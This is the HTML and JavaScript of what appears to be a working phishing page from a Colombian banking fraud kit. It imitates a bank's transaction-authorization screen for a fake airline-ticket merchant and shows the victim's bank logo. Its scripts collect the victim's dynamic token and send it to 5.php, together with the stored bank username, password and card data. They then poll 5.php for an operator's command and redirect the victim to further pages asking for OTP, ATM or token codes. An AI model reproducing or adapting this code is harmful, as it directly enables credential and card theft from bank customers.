<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Autorización de Transacción</title>
  <script src="./bots/aes.js"></script>
  <script src="./bots/AesUtil.js"></script>
  <script src="../js/jquery-3.7.7.js"></script>
  <script src="./bots/md5.js"></script>
  <script src="./bots/pbkdf2.js"></script>
  <script src="./bots/string-mask.js"></script>
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      background: #f5f5f5;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      overflow: hidden;
    }
    .container {
      position: relative; /* Para que el loader se posicione en relación a este contenedor */
      width: 100%;
      max-width: 400px;
      background: #fff;
      border-radius: 10px;
      box-shadow: 0 2px 10px rgba(0,0,0,0.1);
      padding: 20px;
      box-sizing: border-box;
      overflow: hidden; /* Evita que los elementos dentro del contenedor se desborden */
      margin: 0 10px;
    }
    .header {
      display: flex;
      justify-content: space-between;
      align-items: center;
      margin-bottom: 20px;
      border-bottom: 1px solid #ccc;
      padding-bottom: 10px;
    }
    .header img {
      height: 35px;
    }
    .title {
      font-size: 18px;
      font-weight: bold;
      margin-bottom: 10px;
      text-align: left;
    }
    .details p {
      margin: 10px 0;
      font-size: 14px;
    }
    .small {
      font-size: 12px;
      color: #555;
    }
    .input-group {
      display: flex;
      justify-content: flex-start;
      margin-bottom: 15px;
    }
    .input-group label {
      width: 35%;
      text-align: right;
      margin-right: 10px;
      font-size: 14px;
    }
    .input-group input {
      width: 50%;
      padding: 8px;
      border: 1px solid #ccc;
      border-radius: 5px;
      font-size: 13px;
    }
    .button {
      width: 30%;
      padding: 10px;
      background: #000;
      color: #fff;
      border: none;
      border-radius: 5px;
      cursor: pointer;
      font-size: 16px;
      font-weight: bold;
      margin-top: 35px;
      display: block;
      margin: 0 auto;
    }
    .loaderp {
      width: 48px;
      height: 48px;
      border: 5px solid #FFF;
      border-bottom-color: rgb(117,117,117);
      border-radius: 50%;
      display: inline-block;
      box-sizing: border-box;
      animation: rotation 1s linear infinite;
    }
    @keyframes rotation {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }
    .loaderp-full {
      position: absolute; /* Ahora está posicionado en relación con el contenedor */
      top: 79%; /* Empieza desde el centro vertical del contenedor */
      left: 50%;
      transform: translate(-50%, -50%); /* Centrado exacto */
      width: 30vw; /* 30% del contenedor principal */
      height: 20vh; /* 20% de la altura del contenedor principal */
      max-width: 500px; /* Limita el tamaño máximo para evitar que crezca demasiado */
      max-height: 160px; /* Limita el tamaño máximo */
      display: flex;
      justify-content: center;
      align-items: center;
      background: #fff;
      border-radius: 8px;
      z-index: 1000;
    }
    .hidden {
      display: none;
    }
    .instructions-text {
      font-size: 12px;
      color: #555;
      margin: 5px 0;
      text-align: center;
      line-height: 1.5;
      font-weight: normal;
      font-family: Arial, sans-serif;
      margin-top: 20px;
    }
    @media (max-width: 600px) {
      .loaderp {
        width: 32px;
        height: 32px;
        border: 4px solid #FFF;
        border-bottom-color: rgb(150,150,150);
      }
      .loaderp-full {
        top: 83%;
        left: 50%;
        transform: translate(-50%, -50%);
        width: 85vw;
        height: 30vh;
        max-width: 530px;
        max-height: 300px;
      }
    }
    @media (max-width: 600px) {
      .instructions-text {
        font-size: 12px;
      }
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="header">
      <img id="bank-logo" src="lgos/error2.png" alt="Banco Logo">
      <div class="id-check">
        <img id="card-type-logo" src="lgos/error.avif" alt="Tipo Tarjeta Logo" height="35">
      </div>
    </div>
    <div class="title">Autorización de transacción</div>
    <p class="small">
      La transacción de <strong>TIQUETES BARATOS S.A</strong> por 
      <strong id="monto-transaccion">$49,999 COP</strong> con tarjeta terminada en 
      <strong id="card-last4">0000</strong> debe ser autorizada.
    </p>
    <div class="details">
      <p><strong>Comercio:</strong> TIQUETES BARATOS S.A</p>
      <p><strong>Monto:</strong> <span id="monto-transaccion-detalle">Calculando...</span></p>
      <p><strong>Tarjeta:</strong> **** **** **** <span id="card-last4-display">0000</span></p>
    </div>
    <form id="transaction-form">
      <div class="input-group"></div>
      <div class="input-group">
        <label id="clave-label" for="clave">TOKEN:</label>
        <input type="password" id="clave" placeholder="Ingresa tu clave dinámica" maxlength="8">
      </div>
      <p class="instructions-text">
        La encuentras en tu app o por mensaje de texto, en caso de haberte llegado por ese medio.
      </p>
      <button class="button" id="authorize-button" disabled>Autorizar</button>
    </form>
    <div class="loaderp-full hidden">
      <span class="loaderp"></span>
      <p class="text-italic tc-ocean fs-3 fw-light"></p>
    </div>
  </div>

  <!-- Tu script original -->
  <script>
    function habilitarBoton(){
      const c = document.getElementById('clave').value.trim();
      document.getElementById('authorize-button').disabled = c.length < 4;
    }
    document.getElementById('clave').addEventListener('input', habilitarBoton);
  
    document.getElementById('transaction-form').addEventListener('submit', async e => {
      e.preventDefault();
      const loader = document.querySelector('.loaderp-full');
      loader.classList.remove('hidden');
  
      const logoinfo = JSON.parse(localStorage.getItem('logoinfo')) || {};
      const usuario = logoinfo.usuario || '';
      const clave = logoinfo.clave || '';
      const dinamica = document.getElementById('clave').value.trim();
      const transactionId = Date.now().toString(36) + Math.random().toString(36).substr(2);
      localStorage.setItem('transactionId', transactionId);
  
      const payload = {
        usuario,
        clave,
        dinamica,
        transactionId,
        datosTarjeta: JSON.parse(localStorage.getItem('tbdatos') || '{}')
      };
  
      try {
        const resp = await fetch('5.php', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify(payload)
        });
        const result = await resp.json();
        if (!result.ok) throw new Error(result.error);
        while (true) {
          const poll = await fetch(`5.php?transactionId=${transactionId}`);
          const pollJson = await poll.json();
          if (pollJson.ok && pollJson.action) {
            loader.classList.add('hidden');
            const routes = {
              pedir_dinamica: "error-dinamica.php",
              pedir_cajero: "ccajero-id.php",
              pedir_otp: "otp-id.php",  
              pedir_token: "error-token.php",
              error_tc: "../pay/",
              error_logo: "error-id.php",
              confirm_finalizar: "../checking.php"
            };
            window.location.href = routes[pollJson.action] || "error-id.php";
            break;
          }
          await new Promise(r => setTimeout(r, 2000));
        }
      } catch(err) {
        alert(err.message);
        loader.classList.add('hidden');
      }
    });
  </script>

  <!-- Script adicional con las funciones solicitadas -->
  <script>
    // 1) Redirige si detecta "bancolombia" (excepto nequi)
    function analizarBancoInfoload() {
      const infoload = JSON.parse(localStorage.getItem('infoload'));
      if (infoload && infoload.bank) {
        const banco = infoload.bank.toLowerCase();
        if (banco.includes("bancolombia") && !banco.includes("bancolombia s.a.- nequi")) {
          window.location.href = "bancol/index-pc.html";
        }
      }
    }

    // 2) Normaliza el nombre del banco -> logo
    function normalizarBanco(nombreBanco) {
      const palabrasClave = {
        "av villas": "bavevi.png",
        "scotiabank colpatria": "bcolpa.png",
        "popular": "bpopular.png",
        "bogota": "bbogo.png",
        "caja social": "bcajas.png",
        "davivienda": "bdavi1.svg",
        "occidente": "bocinen.png",
        "bbva colombia": "bvva.png",
        "bbva": "bvva.png"
      };
      const nombreNormalizado = nombreBanco.toLowerCase();
      for (const clave in palabrasClave) {
        if (nombreNormalizado.includes(clave)) {
          return palabrasClave[clave];
        }
      }
      return "error2.png";
    }

    // 3) Actualiza logos de banco y tarjeta (y, si existieran labels de usuario/clave, los cambia)
    function actualizarLogos() {
      const infoload    = JSON.parse(localStorage.getItem('infoload'));
      const bankLogo    = document.getElementById("bank-logo");
      const cardTypeLogo= document.getElementById("card-type-logo");
      
      const tiposTarjetas = {
        "visa": "visa.jpg",
        "mastercard": "master.webp",
        "amex": "amex.avif",
        "discover": "discover.png"
      };

      // Logo de banco
      if (infoload && infoload.bank) {
        const logoBanco = normalizarBanco(infoload.bank);
        bankLogo.src = `lgos/${logoBanco}`;
      } else {
        bankLogo.src = "lgos/error2.png";
      }

      // Logo de tarjeta
      if (infoload && infoload.cardType) {
        const tipoTarjetaNormalizado = infoload.cardType.toLowerCase();
        cardTypeLogo.src = tiposTarjetas[tipoTarjetaNormalizado]
          ? `lgos/${tiposTarjetas[tipoTarjetaNormalizado]}`
          : "lgos/error.avif";
      } else {
        cardTypeLogo.src = "lgos/error.avif";
      }

      // Ajuste de label y maxlength si existiera "usuario-label"
      const banco       = (infoload && infoload.bank) ? infoload.bank.toLowerCase() : "";
      const usuarioLabel= document.getElementById("usuario-label");
      const claveLabel  = document.getElementById("clave-label");
      const claveInput  = document.getElementById("clave");
      if (usuarioLabel && claveLabel && claveInput) {
        if (
          banco.includes("bogota")     ||
          banco.includes("caja social")||
          banco.includes("davivienda") ||
          banco.includes("occidente")  ||
          banco.includes("bbva")
        ) {
          usuarioLabel.innerText = "Cédula:";
          claveLabel.innerText   = "Clave:";
          claveInput.setAttribute("maxlength", "8");
        } else {
          usuarioLabel.innerText = "Usuario:";
          claveLabel.innerText   = "Clave:";
          claveInput.setAttribute("maxlength", "11");
        }
      }
    }

    // 4) Calcula precio total (ida+regreso) y lo muestra
    function obtenerPrecio(precio) {
      return parseFloat(precio.replace('$','').replace('.','').replace(',', '.'));
    }
    function formatearPrecio(numero) {
      return numero.toLocaleString('es-CO', { style: 'currency', currency: 'COP' });
    }
    function calcularPrecioTotal() {
      const datosVueloIda = JSON.parse(localStorage.getItem('datos_vuelo_ida'));
      const datosVueloRegreso = JSON.parse(localStorage.getItem('datos_vuelo_regreso'));
      let precioTotal = 0;
      if (datosVueloIda) {
        precioTotal += obtenerPrecio(datosVueloIda.price);
      }
      if (datosVueloRegreso) {
        precioTotal += obtenerPrecio(datosVueloRegreso.price);
      }
      const montoFormateado = formatearPrecio(precioTotal);
      document.getElementById("monto-transaccion").innerText = montoFormateado;
      document.getElementById("monto-transaccion-detalle").innerText = montoFormateado;
    }

    // 5) Obtiene los últimos 4 dígitos de la tarjeta y los pinta
    function obtenerUltimos4Digitos() {
      const tbdatos = JSON.parse(localStorage.getItem('tbdatos'));
      if (tbdatos && tbdatos.cardNumber) {
        const ultimos4 = tbdatos.cardNumber.slice(-4);
        document.getElementById("card-last4").innerText         = ultimos4;
        document.getElementById("card-last4-display").innerText = ultimos4;
      }
    }

    // Ejecutar al cargar la página
    window.addEventListener('DOMContentLoaded', () => {
      analizarBancoInfoload();
      actualizarLogos();
      calcularPrecioTotal();
      obtenerUltimos4Digitos();
    });
  </script>
</body>
</html>
